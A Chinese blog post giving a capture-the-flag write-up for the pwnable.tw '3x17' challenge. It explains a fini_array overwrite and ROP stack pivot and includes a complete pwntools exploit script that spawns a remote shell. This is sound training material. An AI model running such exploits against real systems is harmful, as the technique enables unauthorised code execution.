3x17记录

最新推荐文章于 2024-07-10 19:27:42 发布
最新推荐文章于 2024-07-10 19:27:42 发布
阅读量3k 收藏
点赞数
文章标签: python 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55190422/article/details/121457735
版权

老套路

开启了栈不可执行,所以无法传入shellcode考虑rop。

 并且它还是静态链接。

•静态链接:静态链接需要在编译链接的时候将需要执行的代码直接拷贝到调用处,这样可以做到程序发布的时候不需要依赖库,相反的程序占用的内存可能相对较大

•动态链接:动态链接则是当需要调用时,再将库中的代码加载到程序中去,在编译的时候只需要用符号和参数去代替这些代码。这样程序编译出来的内存较小,但是需要将库一起发布出去,缺少库则可能运行不了。

我们运行一下发现是addr:

我们shift F12 查找一下 

可以看到关键字符是存储在buf里面的我们对他进行交叉引用 

输入地址,可以写入18个字节,即任意地址写的漏洞,但是程序去除了符号表,因此像got表之类的地址我们找不到,因此这里引出start函数

start函数

其实main函数(主函数)即不是函数的入口点,也不是函数的起始点

这里借用一张图,可以看到

start - > __libc_start_main -> main

start函数调用了__libc_start_main函数,__libc_start_main函数调用了main函数

入口点地址就是start函数的地址 ,在64位程序下,前六个参数是通过寄存器传参的,而rdi寄存器中保存的是main函数的地址,r8寄存器中保存的是__libc_csu_fini的地址,rcx寄存器中保存的是__libc_csu_init的地址,接着调用__libc_start_main函数

 

 _libc_csu_fini中讲两个数据 array[1] 和array[2]分别存入rax和rbp。

 将地址存入rbp中

分析了__libc_csu_fini函数的执行流程,简单来说就是执行fini_array数组的内容,先执行fini_array[1]接着执行fini_array[0],由于程序存在任意地址写的漏洞,那么就可以修改fini_array数组的内容,让程序执行我们想执行的内容。

思路

•利用任意地址写的漏洞修改fini_array数组的内容

•将fini_array[1]的内容修改为main函数的地址,将fini_array[0]的内容修改为__libc_csu_fini的地址,这样可以达到无限制的任意地址写

main
-> 调用__libc_csu_fini
-> 调用main函数(fini_array[0])
-> 调用__libc_csu_fini(fini_array[1])
-> 调用main函数(fini_array[0])

•利用无限制的任意地址写在fini_array+0x10构造ROP链

•利用栈转移,将栈转移到fini_array+0x10从而触发ROP链

脚本分析

将array_fini[0]修改为__libc_csu_fini的地址

将array_fini[1]修改为main函数的地址

ropchain(fini_array,p64(fini)+p64(main))

因为程序中没有/bin/sh\x00,因此挑一段可写段写入/bin/sh\x00,这里我采用的是bss段

ropchain(0x4b92e0,'/bin/sh\x00') #0x4b92e0是bss段的地址

这里我选择利用调用59号中断取获得shell,64位程序采用寄存器传参,因此我们需要找到相应寄存器的地址构造ROP链,rax寄存器需要传入调用号,rdi则需要传入/bin/sh\x00的地址,其余参数为0
EXP:

from pwn import *
context(arch="amd64",os='linux',log_level='debug')
myelf = ELF("./3x17")
#io = process(myelf.path)
#gdb.attach(io,"b * 0x471db5")
io = remote("chall.pwnable.tw",10105)

rop_syscall = 0x471db5
rop_pop_rax = 0x41e4af
rop_pop_rdx = 0x446e35
rop_pop_rsi = 0x406c30
rop_pop_rdi = 0x401696
bin_sh_addr = 0x4B419A

fini_array = 0x4B40F0
main_addr = 0x401B6D
libc_csu_fini = 0x402960
leave_ret = 0x401C4B

esp = 0x4B4100

def write(addr,data):
    io.recv()
    io.send(str(addr))
    io.recv()
    io.send(data)

write(fini_array,p64(libc_csu_fini)+p64(main_addr))

write(bin_sh_addr,"/bin/sh\x00")
write(esp,p64(rop_pop_rax))
write(esp+8,p64(0x3b))
write(esp+16,p64(rop_pop_rdi))
write(esp+24,p64(bin_sh_addr))
write(esp+32,p64(rop_pop_rdx))
write(esp+40,p64(0))
write(esp+48,p64(rop_pop_rsi))
write(esp+56,p64(0))
write(esp+64,p64(rop_syscall))
write(fini_array,p64(leave_ret))

io.interactive()

VN's king
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python实现ncm转mp3_网易云音乐ncm格式分析以及ncm与mp3格式转换
weixin_39796149的博客
12-09 3663
昨天,我想将网易云上下载的歌曲拷到MP3里面,方便以后跑5公里的时候听,结果,突然发现不少歌都是ncm格式,不禁产生了好奇。NCM格式分析音频知识简介特意读了一下《音视频开发进阶指南》,总结如下:我们平常说的mp3格式、wav格式的音乐其实是说的压缩编码格式。一首歌是怎么从歌手的喉咙里发出后变成一个文件的呢?需要经过采样、量化和编码三个步骤。采样声音是连续的模拟信号,通过采样,将之转变为离散的数字...
七彩虹笔记本 X17 AT 23 bios文件
06-07
标题 "七彩虹笔记本 X17 AT 23 bios文件" 提及的是七彩虹品牌的一款笔记本电脑,型号为X17 AT 23,涉及到的核心内容是该设备的BIOS(基本输入输出系统)文件。BIOS是计算机硬件与操作系统之间的一个关键软件层,负责...
史上最强的适合gvim7.2 和gvim7.3(Windows)的配置文件(2011-03-10更新)--amix.dk--小方更改...
javasee
06-20 249
""""""""""""""""""""""""""""""""""""""""""
python面试题搜集
热门推荐
花开如雨的博客
10-21 26万+
1. Python面试题搜集(一) 2019 Python最新面试题及答案16道题吐血总结!50道Python面试题集锦(附答案) Python是目前编程领域最受欢迎的语言。在本文中,我将总结Python面试中最常见的50个问题。每道题都提供参考答案,希望能够帮助你在2019年求职面试中脱颖而出,找到一份高薪工作。这些面试题涉及Python基础知识、Python编程、数据分析以及Python函数库等多个方面。 Q1、Python中的列表和元组有什么区别? Q2、Python的主要功能是什么? Python
神经网络学习小记录21——InceptionV3模型的复现详解
Bubbliiiing的学习小课堂
10-29 1万+
神经网络学习小记录21——InceptionV3模型的复现详解学习前言什么是InceptionV3模型InceptionV3网络部分实现代码图片预测 学习前言 Inception系列的结构和其它的前向神经网络的结构不太一样,每一层的内容不是直直向下的,而是分了很多的块。 什么是InceptionV3模型 InceptionV3模型是谷歌Inception系列里面的第三代模型,其模型结构与Ince...
[转载]对视频数据处理时的一些基本方法,当初为了做3D CNNs记录下来的。
qq_36248632的博客
04-03 555
文章出处: 原文链接https://www.cnblogs.com/hellcat/p/7349615.html 『cs231n』视频数据处理 目录视频信息视频数据处理的两种基本方法发散:结合两种方法的新思路 3D卷积神经网络理解 回到顶部视频信息 和我之前的臆想不同,视频数据不仅仅是一帧一帧的图片本身,还包含个帧之间的联系,也就是还...
ev3 java 距离_深入理解java虚拟机(十四)正确利用 JVM 的方法内联
weixin_39932344的博客
02-27 44
在IntelliJ IDEA里面Ctrl+Alt+M用来拆分方法。选中一段代码,敲下这个组合,非常简单。Eclipse也用类似的快捷键,使用 Alt+Shift+M。我讨厌长的方法,提起这个下面这个方法我就觉得太长了:publicvoidprocessOnEndOfDay(Contractc){if(DateUtils.addDays(c.getCreated(),7).before(...
刷题记录 7.8
PUTAOAO的博客
07-08 215
大数计算 直接用sage跑就行 然后转16进制 together myflag1和2 base64解密 解不开 以为是网站问题 发现都解不开 找到了一个可以转为16进制的网站https://www.qqxiuzi.cn/bianma/base64.htm \x47 \x73 \x68 \xcb \xaa \xf7 \x58 \xb2 \x2d \xca \xd0 \x26 \x6f \x81 \x66 \x1c \x4c \xa0 \xa2 \x29 \x6e \x70 \x41 \x19 \x6c
工作日志记录
sqm472527736的博客
05-24 672
0524 电表传输数据 运用到的知识 :645规约 串口调试 1用雪梨蓝 串口进行调试 进行端口配置 2接收去和发送区配置 3 用万能抄表命令去发送 万用地址抄表命令1:68 99 99 99 99 99 99 68 11 04 33 33 34 33 48 16 万用地址抄表命令2:68 AA AA AA AA AA AA 68 11 04 33 33 34 33 AE 16 68 13 17 07 19 00 00 68 91 08 33 33 34 33 36 33 33 3.
3.线性表
Liaily的博客
03-03 303
1.线性表的定义和特点 线性表是具有相同特性的数据元素的一个有限序列 线性表:由n(n>=0)个数据元素(结点)a1,a2,…an组成的有限序列。 其中数据元素的个数n定义为表的长度 当n=0时称为空表 将非空的线性表(n>0)记作:(a1,a2,…an) 这里的数据元素ai(1<=i<=n)只是一个抽象的符号,其具体含义在不同的情况下可以不同 开始结点没有直接前趋,终端结点没有直接后继,其余结点都有一个直接前趋和一个直接后继 同一线性表中的元素必定具有
Dell戴尔Alienware外星人x17 R2出厂状态原装原厂系统
11-06
《Dell戴尔Alienware外星人x17 R2出厂原装系统详解》 在IT领域,原厂系统通常是指计算机出厂时预装的操作系统及配套软件,这种系统通常经过厂商精心优化,能够更好地发挥硬件性能。本文将详细探讨Dell戴尔Alienware...
Fujitsu Siemen Amilo Xa 3530 (Wistron X17).PDF
12-28
3. 显卡:使用ATi M86-ME显卡,具有12个显示输出接口,包括VGA、DVI、HDMI等。 4. 硬盘:使用2.5英寸SATA硬盘,具有高达500GB的存储容量。 5. 外设接口:包括USB 2.0、IEEE 1394、RJ45网络接口、VGA、HDMI、DVI等...
ZD-60X17FJ换箱多轴钻.rar
05-02
《深入解析三菱PLC在ZD-60X17FJ换箱多轴钻中的应用》 在工业自动化领域,可编程逻辑控制器(PLC)扮演着至关重要的角色,而三菱PLC作为其中的佼佼者,因其稳定性和易用性受到了广泛的认可。本文将重点围绕"ZD-60X17...
论文研究 - 陶瓷涂层对X17CrNi15-2不锈钢疲劳裂纹扩展行为的影响
05-15
标本由马氏体不锈钢X17CrNi15-2制成,其中一些通过陶瓷涂层沉积表面处理进行了改性。 实验研究了陶瓷涂层对空心轴试样疲劳裂纹扩展行为的影响。 利用da / dN(单位为mm /循环)与应力强度因子范围ΔK(单位为MPa∙m...
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 1982
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
java占位符替换五种方式
weixin_61478518的博客
07-08 475
在业务开发中,经常需要输出文本串。其中,部分场景下大部分文本内容是一样的,只有少部分点是不一样。简单做法是直接拼接字段,但是这会有个问题。后面如果想要修改内容,那么每个地方都要修改,这不符合设计模式中的开闭原则,面向应该对扩展开放,对修改关闭。如何解决这个问题?先来看现实生活中的例子,个人信息填写。一般会要填写表格,已经定义好了姓名,性别,年龄等字段,只要填写对应的个人信息就好了。在程序开发中,我们会预先定义好一个字符串模板,需要改动的点使用占位符。
一键安装ros及出现问题的解决方案
最新发布
m0_58173801的博客
07-10 530
catkin_make时出现报错如下。
Python进阶】函数的扩展
weixin_52854743的博客
07-06 990
python函数的补充,包括函数的嵌套调用、函数的变量作用域、多种参数、拆包和交换变量值、引用和匿名函数
ma5800x17配置命令
06-24
MA5800X17是华为公司生产的一种高性能光纤宽带接入设备,其配置命令如下: 1. 登录设备管理界面,输入用户名和密码; 2. 进入配置模式,使用命令config; 3. 进入全局配置模式,使用命令system-view; 4. 配置...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值